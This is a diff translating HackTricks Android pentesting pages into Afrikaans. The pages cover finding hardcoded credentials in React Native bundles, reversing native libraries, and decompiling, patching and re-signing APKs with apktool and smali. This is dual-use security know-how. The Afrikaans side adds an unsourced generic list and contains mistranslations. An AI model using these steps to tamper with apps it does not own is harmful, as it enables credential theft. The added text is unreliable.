``` +Jy kan die lêer oplaai na [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) of volg hierdie stappe: -You can upload the file to [https://spaceraccoon.github.io/webpack-exploder/](https://spaceraccoon.github.io/webpack-exploder/) or follow these steps: +1. Maak die `index.html` lêer oop in Google Chrome. -1. Open the `index.html` file in Google Chrome. +2. Maak die Ontwikkelaarstoolbalk oop deur **Command+Option+J vir OS X** of **Control+Shift+J vir Windows** te druk. -2. Open the Developer Toolbar by pressing **Command+Option+J for OS X** or **Control+Shift+J for Windows**. +3. Klik op "Bronne" in die Ontwikkelaarstoolbalk. Jy behoort 'n JavaScript-lêer te sien wat verdeel is in gids en lêers, wat die hoofbundel uitmaak. -3. Click on "Sources" in the Developer Toolbar. You should see a JavaScript file that is split into folders and files, making up the main bundle. +As jy 'n lêer genaamd `index.android.bundle.map` vind, sal jy die bronkode in 'n ongeminifiseerde formaat kan analiseer. Kaartlêers bevat bronkartering, wat jou in staat stel om geminifiseerde identifiseerders te karteer. -If you find a file called `index.android.bundle.map`, you will be able to analyze the source code in an unminified format. Map files contain source mapping, which allows you to map minified identifiers. +Om te soek na sensitiewe geloofsbriewe en eindpunte, volg hierdie stappe: -To search for sensitive credentials and endpoints, follow these steps: +1. Identifiseer sensitiewe sleutelwoorde om die JavaScript-kode te analiseer. React Native-toepassings gebruik dikwels derdeparty-diens soos Firebase, AWS S3-diens-eindpunte, private sleutels, ens. -1. Identify sensitive keywords to analyze the JavaScript code. React Native applications often use third-party services like Firebase, AWS S3 service endpoints, private keys, etc. +2. In hierdie spesifieke geval is daar opgemerk dat die toepassing die Dialogflow-diens gebruik. Soek na 'n patroon wat verband hou met sy konfigurasie. -2. In this specific case, the application was observed to be using the Dialogflow service. Search for a pattern related to its configuration. +3. Dit was gelukkig dat sensitiewe hardgekodeerde geloofsbriewe gevind is in die JavaScript-kode gedurende die verkenningsproses. -3. It was fortunate that sensitive hard-coded credentials were found in the JavaScript code during the recon process. - -## References +## Verwysings * [https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7](https://medium.com/bugbountywriteup/lets-know-how-i-have-explored-the-buried-secrets-in-react-native-application-6236728198f7)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 028f2cc59..e9c4e8428 100644 --- a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -1,72 +1,72 @@ -# Reversing Native Libraries +# Omgekeerde Ingenieurswese van Inheemse Biblioteke
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-**For further information check: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)** +**Vir verdere inligting, kyk: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)** -Android apps can use native libraries, typically written in C or C++, for performance-critical tasks. Malware creators also use these libraries, as they're harder to reverse engineer than DEX bytecode. The section emphasizes reverse engineering skills tailored to Android, rather than teaching assembly languages. ARM and x86 versions of libraries are provided for compatibility. +Android-apps kan inheemse biblioteke gebruik, tipies geskryf in C of C++, vir prestasie-kritieke take. Malware-skeppers gebruik ook hierdie biblioteke, omdat dit moeiliker is om te ontleed as DEX-bytekode. Die afdeling beklemtoon omgekeerde ingenieurswese-vaardighede wat toegespits is op Android, eerder as om assambleertaal te leer. ARM- en x86-weergawes van biblioteke word verskaf vir versoenbaarheid. -### Key Points: -- **Native Libraries in Android Apps:** - - Used for performance-intensive tasks. - - Written in C or C++, making reverse engineering challenging. - - Found in `.so` (shared object) format, similar to Linux binaries. - - Malware creators prefer native code to make analysis harder. +### Sleutelpunte: +- **Inheemse Biblioteke in Android-apps:** +- Gebruik vir prestasie-intensiewe take. +- Geskryf in C of C++, wat omgekeerde ingenieurswese uitdagend maak. +- Word gevind in `.so` (gedeelde voorwerp) formaat, soortgelyk aan Linux-binêre lêers. +- Malware-skeppers verkies inheemse kode om analise moeiliker te maak. - **Java Native Interface (JNI) & Android NDK:** - - JNI allows Java methods to be implemented in native code. - - NDK is an Android-specific set of tools to write native code. - - JNI and NDK bridge Java (or Kotlin) code with native libraries. +- JNI maak dit moontlik dat Java-metodes in inheemse kode geïmplementeer kan word. +- NDK is 'n Android-spesifieke stel gereedskap om inheemse kode te skryf. +- JNI en NDK koppel Java (of Kotlin) kode met inheemse biblioteke. -- **Library Loading & Execution:** - - Libraries are loaded into memory using `System.loadLibrary` or `System.load`. - - JNI_OnLoad is executed upon library loading. - - Java-declared native methods link to native functions, enabling execution. +- **Biblioteeklaaiing & Uitvoering:** +- Biblioteke word in die geheue gelaai deur gebruik te maak van `System.loadLibrary` of `System.load`. +- JNI_OnLoad word uitgevoer wanneer die biblioteek gelaai word. +- Java-verklaarde inheemse metodes skakel na inheemse funksies, wat uitvoering moontlik maak. -- **Linking Java Methods to Native Functions:** - - **Dynamic Linking:** Function names in native libraries match a specific pattern, allowing automatic linking. - - **Static Linking:** Uses `RegisterNatives` for linking, providing flexibility in function naming and structure. +- **Koppeling van Java-metodes aan Inheemse Funksies:** +- **Dinamiese Koppeling:** Funksienames in inheemse biblioteke stem ooreen met 'n spesifieke patroon, wat outomatiese koppeling moontlik maak. +- **Statiese Koppeling:** Gebruik `RegisterNatives` vir koppeling, wat buigsaamheid bied in funksienamering en -struktuur. -- **Reverse Engineering Tools and Techniques:** - - Tools like Ghidra and IDA Pro help analyze native libraries. - - `JNIEnv` is crucial for understanding JNI functions and interactions. - - Exercises are provided to practice loading libraries, linking methods, and identifying native functions. +- **Omgekeerde Ingenieurswese-hulpmiddels en -tegnieke:** +- Hulpmiddels soos Ghidra en IDA Pro help om inheemse biblioteke te analiseer. +- `JNIEnv` is van kritieke belang vir die verstaan van JNI-funksies en interaksies. +- Oefeninge word verskaf om die laai van biblioteke, koppeling van metodes en identifisering van inheemse funksies te oefen. -### Resources: -- **Learning ARM Assembly:** - - Suggested for a deeper understanding of the underlying architecture. - - [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) from Azeria Labs is recommended. +### Hulpbronne: +- **Leer ARM-assambleertaal:** +- Aanbeveel vir 'n dieper begrip van die onderliggende argitektuur. +- [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) van Azeria Labs word aanbeveel. -- **JNI & NDK Documentation:** - - [Oracle's JNI Specification](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) - - [Android's JNI Tips](https://developer.android.com/training/articles/perf-jni) - - [Getting Started with the NDK](https://developer.android.com/ndk/guides/) +- **JNI & NDK-dokumentasie:** +- [Oracle se JNI-spesifikasie](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html) +- [Android se JNI-tips](https://developer.android.com/training/articles/perf-jni) +- [Begin met die NDK](https://developer.android.com/ndk/guides/) -- **Debugging Native Libraries:** - - [Debug Android Native Libraries Using JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3) +- **Debugeer Inheemse Biblioteke:** +- [Debugeer Android Inheemse Biblioteke met JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/mobile-pentesting/android-app-pentesting/smali-changes.md b/mobile-pentesting/android-app-pentesting/smali-changes.md index 911465ee1..825963cd0 100644 --- a/mobile-pentesting/android-app-pentesting/smali-changes.md +++ b/mobile-pentesting/android-app-pentesting/smali-changes.md @@ -1,130 +1,113 @@ -# Smali - Decompiling/\[Modifying]/Compiling +# Smali - Ontkompilering/\[Wysiging]/Kompilering
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it. +Soms is dit interessant om die toepassingskode te wysig om toegang te verkry tot verborge inligting vir jou (miskien goed verduisterde wagwoorde of vlae). Dan kan dit interessant wees om die apk te ontkompileer, die kode te wysig en dit weer te kompileer. -**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html) +**Opcodes verwysing:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html) -## Fast Way +## Vinnige Metode -Using **Visual Studio Code** and the [APKLab](https://github.com/APKLab/APKLab) extension, you can **automatically decompile**, modify, **recompile**, sign & install the application without executing any command. +Met behulp van **Visual Studio Code** en die [APKLab](https://github.com/APKLab/APKLab) uitbreiding, kan jy die toepassing **outomaties ontkompileer**, wysig, **kompileer**, onderteken & installeer sonder om enige bevel uit te voer. -Another **script** that facilitates this task a lot is [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh) +'n Ander **skripsie** wat hierdie taak baie vergemaklik, is [**https://github.com/ax/apk.sh**](https://github.com/ax/apk.sh) -## Decompile the APK - -Using APKTool you can access to the **smali code and resources**: +## Ontkompileer die APK +Met behulp van APKTool kan jy toegang kry tot die **smali-kode en hulpbronne**: ```bash apktool d APP.apk ``` +As **apktool** jou enige fout gee, probeer om die [**nuutste weergawe**](https://ibotpeaches.github.io/Apktool/install/) te installeer. -If **apktool** gives you any error, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) +Sommige **interessante lêers waarop jy moet let** is: -Some **interesting files you should look are**: - -* _res/values/strings.xml_ (and all xmls inside res/values/\*) +* _res/values/strings.xml_ (en alle xml's binne res/values/\*) * _AndroidManifest.xml_ -* Any file with extension _.sqlite_ or _.db_ +* Enige lêer met die uitbreiding _.sqlite_ of _.db_ -If `apktool` has **problems decoding the application** take a look to [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) or try using the argument **`-r`** (Do not decode resources). Then, if the problem was in a resource and not in the source code, you won't have the problem (you won't also decompile the resources). +As `apktool` **probleme ondervind met die dekodeer van die toepassing**, kyk na [https://ibotpeaches.github.io/Apktool/documentation/#framework-files](https://ibotpeaches.github.io/Apktool/documentation/#framework-files) of probeer om die argument **`-r`** te gebruik (Dekodeer nie hulpbronne nie). As die probleem in 'n hulpbron was en nie in die bronkode nie, sal jy nie die probleem hê nie (jy sal ook nie die hulpbronne dekodeer nie). -## Change smali code +## Verander smali-kode -You can **change** **instructions**, change the **value** of some variables or **add** new instructions. I change the Smali code using [**VS Code**](https://code.visualstudio.com), you then install the **smalise extension** and the editor will tell you if any **instruction is incorrect**.\ -Some **examples** can be found here: +Jy kan **instruksies verander**, die **waarde** van sommige veranderlikes verander of **nuwe instruksies byvoeg**. Ek verander die Smali-kode met behulp van [**VS Code**](https://code.visualstudio.com), jy installeer dan die **smalise-uitbreiding** en die redakteur sal jou vertel of enige **instruksie onjuis** is.\ +Sommige **voorbeelde** kan hier gevind word: -* [Smali changes examples](smali-changes.md) +* [Voorbeelde van Smali-veranderinge](smali-changes.md) * [Google CTF 2018 - Shall We Play a Game?](google-ctf-2018-shall-we-play-a-game.md) -Or you can [**check below some Smali changes explained**](smali-changes.md#modifying-smali). +Of jy kan [**hieronder 'n paar Smali-veranderinge wat verduidelik word, nagaan**](smali-changes.md#modifying-smali). -## Recompile the APK - -After modifying the code you can **recompile** the code using: +## Kompileer die APK weer +Nadat jy die kode verander het, kan jy die kode **kompileer** deur gebruik te maak van: ```bash apktool b . #In the folder generated when you decompiled the application ``` +Dit sal die nuwe APK **kompileer** binne die _**dist**_ vouer. -It will **compile** the new APK **inside** the _**dist**_ folder. +As **apktool** 'n **fout** gooi, probeer [die **nuutste weergawe** installeer](https://ibotpeaches.github.io/Apktool/install/) -If **apktool** throws an **error**, try[ installing the **latest version**](https://ibotpeaches.github.io/Apktool/install/) - -### **Sign the new APK** - -Then, you need to **generate a key** (you will be asked for a password and for some information that you can fill randomly): +### **Onderteken die nuwe APK** +Dan moet jy 'n **sleutel genereer** (jy sal gevra word vir 'n wagwoord en vir sommige inligting wat jy lukraak kan invul): ```bash keytool -genkey -v -keystore key.jks -keyalg RSA -keysize 2048 -validity 10000 -alias ``` - -Finally, **sign** the new APK: - +Uiteindelik, **teken** die nuwe APK: ```bash jarsigner -keystore key.jks path/to/dist/* ``` +### Optimeer nuwe aansoek -### Optimize new application - -**zipalign** is an archive alignment tool that provides important optimisation to Android application (APK) files. [More information here](https://developer.android.com/studio/command-line/zipalign). - +**zipalign** is 'n argief-uitlyningstool wat belangrike optimalisering aan Android-aansoek (APK) lêers bied. [Meer inligting hier](https://developer.android.com/studio/command-line/zipalign). ```bash zipalign [-f] [-v] infile.apk outfile.apk zipalign -v 4 infile.apk ``` +### **Onderteken die nuwe APK (weer?)** -### **Sign the new APK (again?)** - -If you **prefer** to use [**apksigner**](https://developer.android.com/studio/command-line/) instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling. BUT NOTICE THAT YOU ONLY HAVE TO **SIGN THE APPLCIATION ONCE** WITH jarsigner (before zipalign) OR WITH aspsigner (after zipaling). - +As jy verkies om [apksigner](https://developer.android.com/studio/command-line/) te gebruik in plaas van jarsigner, moet jy die apk onderteken nadat jy die optimalisering met zipalign toegepas het. MAAR LET OP DAT JY DIE AANSOEK SLEGS EEN KEER MOET ONDERTEKEN MET jarsigner (voor zipalign) OF MET apksigner (na zipalign). ```bash apksigner sign --ks key.jks ./dist/mycompiled.apk ``` +## Wysiging van Smali -## Modifying Smali - -For the following Hello World Java code: - +Vir die volgende Hello World Java-kode: ```java public static void printHelloWorld() { - System.out.println("Hello World") +System.out.println("Hello World") } ``` - -The Smali code would be: - +Die Smali-kode sal wees: ```java .method public static printHelloWorld()V - .registers 2 - sget-object v0, Ljava/lang/System;->out:Ljava/io/PrintStream; - const-string v1, "Hello World" - invoke-virtual {v0,v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V - return-void +.registers 2 +sget-object v0, Ljava/lang/System;->out:Ljava/io/PrintStream; +const-string v1, "Hello World" +invoke-virtual {v0,v1}, Ljava/io/PrintStream;->println(Ljava/lang/String;)V +return-void .end method ``` +Die Smali instruksie stel is beskikbaar [hier](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions). -The Smali instruction set is available [here](https://source.android.com/devices/tech/dalvik/dalvik-bytecode#instructions). +### Ligte Veranderinge -### Light Changes - -### Modify initial values of a variable inside a function - -Some variables are defined at the beginning of the function using the opcode _const_, you can modify its values, or you can define new ones: +### Wysig aanvanklike waardes van 'n veranderlike binne 'n funksie +Sommige veranderlikes word aan die begin van die funksie gedefinieer deur die opcode _const_, jy kan sy waardes wysig, of jy kan nuwe een definieer: ```bash #Number const v9, 0xf4240 @@ -132,9 +115,51 @@ const/4 v8, 0x1 #Strings const-string v5, "wins" ``` +### Basiese Operasies -### Basic Operations +#### Smali-lêers wysig +Smali-lêers is die mensleesbare weergawe van die Android Dalvik Bytecode. Dit kan gewysig word om die gedrag van 'n Android-toepassing te verander. Hier is 'n paar basiese operasies wat jy kan uitvoer op Smali-lêers: + +##### 1. Instruksies toevoeg + +Jy kan nuwe instruksies byvoeg om die funksionaliteit van die toepassing te verander. Byvoorbeeld, jy kan 'n nuwe funksie implementeer deur die nodige Smali-instruksies by te voeg. + +##### 2. Instruksies verwyder + +As jy 'n spesifieke funksie of gedrag wil uitskakel, kan jy die relevante Smali-instruksies verwyder. Dit sal verhoed dat die toepassing daardie spesifieke funksie uitvoer. + +##### 3. Instruksies wysig + +Jy kan bestaande Smali-instruksies wysig om die funksionaliteit van die toepassing aan te pas. Byvoorbeeld, jy kan 'n waarde verander wat deur 'n instruksie gebruik word, of jy kan 'n voorwaardelike instruksie verander om 'n ander pad te volg. + +##### 4. Metodes vervang + +Jy kan bestaande metodes in die Smali-lêer vervang met jou eie implementasie. Dit gee jou die vermoë om die funksionaliteit van die toepassing te verander sonder om nuwe instruksies by te voeg. + +##### 5. Klasstruktuur wysig + +Jy kan die klasstruktuur van die Smali-lêer wysig deur klasse te verwyder, nuwe klasse by te voeg of bestaande klasse te wysig. Hierdie operasie kan die gedrag van die toepassing drasties verander. + +##### 6. Hulpbronne wysig + +Smali-lêers bevat ook verwysings na hulpbronne soos teks, beelde en klanklêers. Jy kan hierdie hulpbronne wysig om die visuele of klankaspekte van die toepassing te verander. + +##### 7. Manifestlêer wysig + +Die manifestlêer bevat belangrike inligting oor die toepassing, soos die toestemmings wat dit vereis en die komponente wat dit bevat. Jy kan die manifestlêer wysig om die toepassing se gedrag te beïnvloed. + +##### 8. Smali-lêers saamvoeg + +As jy 'n nuwe funksie wil toevoeg wat afhanklik is van bestaande Smali-kode, kan jy die lêers saamvoeg om die funksionaliteit te bereik. + +##### 9. Smali-lêers opsplit + +As jy slegs 'n deel van die Smali-kode wil wysig, kan jy die lêers opsplit en slegs die relevante deel wysig. + +##### 10. Smali-lêers onderteken + +Nadat jy die Smali-lêers gewysig het, moet jy dit onderteken om te verseker dat die toepassing korrek uitgevoer word. ```bash #Math add-int/lit8 v0, v2, 0x1 #v2 + 0x1 and save it in v0 @@ -157,11 +182,9 @@ iput v0, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I #Save v0 inside if-ne v0, v9, :goto_6 #If not equals, go to: :goto_6 goto :goto_6 #Always go to: :goto_6 ``` - -### Bigger Changes +### Groter Veranderinge ### Logging - ```bash #Log win: iget v5, p0, Lcom/google/ctf/shallweplayagame/GameActivity;->o:I #Get this.o inside v5 @@ -170,21 +193,19 @@ move-result-object v1 #Move to v1 const-string v5, "wins" #Save "win" inside v5 invoke-static {v5, v1}, Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I #Logging "Wins: " ``` +Aanbevelings: -Recommendations: +* As jy verklaarde veranderlikes binne die funksie gaan gebruik (verklaarde v0,v1,v2...), plaas hierdie lyne tussen die _.local \_ en die verklarings van die veranderlikes (_const v0, 0x1_) +* As jy die logkode in die middel van die funksie se kode wil plaas: +* Voeg 2 by die aantal verklaarde veranderlikes: Byvoorbeeld: vanaf _.locals 10_ na _.locals 12_ +* Die nuwe veranderlikes moet die volgende nommers van die reeds verklaarde veranderlikes wees (in hierdie voorbeeld moet dit _v10_ en _v11_ wees, onthou dat dit begin by v0). +* Verander die kode van die logfunksie en gebruik _v10_ en _v11_ in plaas van _v5_ en _v1_. -* If you are going to use declared variables inside the function (declared v0,v1,v2...) put these lines between the _.local \_ and the declarations of the variables (_const v0, 0x1_) -* If you want to put the logging code in the middle of the code of a function: - * Add 2 to the number of declared variables: Ex: from _.locals 10_ to _.locals 12_ - * The new variables should be the next numbers of the already declared variables (in this example should be _v10_ and _v11_, remember that it starts in v0). - * Change the code of the logging function and use _v10_ and _v11_ instead of _v5_ and _v1_. +### Rooster -### Toasting - -Remember to add 3 to the number of _.locals_ at the beginning of the function. - -This code is prepared to be inserted in the **middle of a function** (**change** the number of the **variables** as necessary). It will take the **value of this.o**, **transform** it to **String** and them **make** a **toast** with its value. +Onthou om 3 by die aantal _.locals_ aan die begin van die funksie te voeg. +Hierdie kode is gereed om in die **middel van 'n funksie** **ingevoeg** te word (**verander** die nommer van die **veranderlikes** soos nodig). Dit sal die **waarde van this.o** neem, dit na 'n **String** omskep en dan 'n **rooster** maak met sy waarde. ```bash const/4 v10, 0x1 const/4 v11, 0x1 @@ -196,17 +217,16 @@ invoke-static {p0, v11, v12}, Landroid/widget/Toast;->makeText(Landroid/content/ move-result-object v12 invoke-virtual {v12}, Landroid/widget/Toast;->show()V ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md index fb0d43259..d9446bc8b 100644 --- a/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md +++ b/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md @@ -1,61 +1,57 @@ - -
